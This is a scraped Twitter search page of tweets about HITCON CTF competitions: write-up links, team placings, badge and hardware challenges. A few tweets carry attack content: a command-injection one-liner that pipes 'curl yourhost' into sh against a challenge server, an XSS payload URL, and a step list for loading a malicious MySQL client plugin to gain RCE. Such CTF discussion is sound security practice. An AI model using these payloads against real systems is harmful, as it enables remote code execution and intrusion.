Twitter | Pretraživanje | |
Pretraživanje Osvježi
bookgin 14. lis
GoGo PowerSQL unintended RCE solution: 1. Pollute environment variable 2. libmysqlclient will load plugin from LIBMYSQL_PLUGINS 3. But it will append annoying .so 4. Bypass by sending 512 bytes ./././ ... 5. Load the malicious plugin from /proc/self/fd/0 6. Profit 🍊
Reply Retweet Označi sa "sviđa mi se"
Paul Axe 6. stu 2017.
curl 'http://13.115.136.15/?url=a&filename=|curl+yourhost|sh';curl 'http://13.115.136.15/?url=file:|curl+yourhost|sh' SSRFme writeup
Reply Retweet Označi sa "sviđa mi se"
vash 8. pro 2017.
Many good talks in these two days! Good job and thank u 🙏
Reply Retweet Označi sa "sviđa mi se"
terjanq 14. lis
My team with myself included solved all 🍊 from this year ctf. I also managed to get the first blood on Bounty Pl33z with this unintended solution :) http://3.114.5.202/fd.php?q=%60%7D%2b%22%2balert(1337);x=%60%7D%7B(class%20$%7By=%60
Reply Retweet Označi sa "sviđa mi se"
terjanq 14. lis
This is so insane. This was a straight-forward solution for Buggy .Net from
Reply Retweet Označi sa "sviđa mi se"
yuawn 27. kol
I designed a simple pwnable challenge on a MCU chip with tiny TrustZone on it for this year's Badge Challenge. Pwn the badge for all patterns! Badge source code, hardware designs and exploits are now released:
Reply Retweet Označi sa "sviđa mi se"
berming 16. lis
My writeup for [HITCON 2019 CTF] One Punch Man, there's no check while unlinking chunks from small bin into tcache, hmm...
Reply Retweet Označi sa "sviđa mi se"
will whang 28. srp 2018.
Working on this for quite a while, this year 2018 Badge - Cold wallet with Secure Element!
Reply Retweet Označi sa "sviđa mi se"
邱柏森 18. pro 2017.
Those pictures are HITCON CTF competition environment. Using 4 rented server to host all virtual machines. Actually, in first picture, all machine are putting on the folding hand cart during the hold competition. -CTF
Reply Retweet Označi sa "sviđa mi se"
とある診断員 24. kol
The competition is over!Thank you for your hard work!
Reply Retweet Označi sa "sviđa mi se"
☞ zǝuıʇɹɐɯ olqɐd ☜ 22. lis 2018.
Write-up for "One Line PHP Challenge" by , worth reading!
Reply Retweet Označi sa "sviđa mi se"
KT 21. stu 2017.
This libwww-perl vulnerability was a 0-day on CTF (SSRF Me challenge). A CTFer reported it:
Reply Retweet Označi sa "sviđa mi se"
とある診断員 24. kol
Mini Hardenig in HITCON CMT 2019 will start soon!
Reply Retweet Označi sa "sviđa mi se"
Luat Nguyen 7. pro 2017.
Capture The Food @ Taipei CTF Final 2017
Reply Retweet Označi sa "sviđa mi se"
邱柏森 15. pro
HITCON CTF 2019 Final competition hardware equipments How many equipment you can recognize?
Reply Retweet Označi sa "sviđa mi se"
Payload 14. lis
This is how we got first solve in EV3-Arm Now I and hve EV3’s arm
Reply Retweet Označi sa "sviđa mi se"
Balsn 14. lis
We got 2nd place in HITCON Quals 2019! HITCON is definitely one of the best CTFs! We really learn a lot in this one. Let's give the organizers a standing ovation 👭👏.
Reply Retweet Označi sa "sviđa mi se"
Andrea Biondo @ 36C3 23. lis 2018.
My writeup for the "Secret Note" challenge in HITCON CTF 2018 - unfortunately I didn't have much time to play, but it was an amazing CTF!
Reply Retweet Označi sa "sviđa mi se"
の 24. kol
Finish! Thank you everyone!!
Reply Retweet Označi sa "sviđa mi se"
David Chiang 7. stu 2017.
Official writeup of Real Ruby Escaping in hitcon-quals-2017
Reply Retweet Označi sa "sviđa mi se"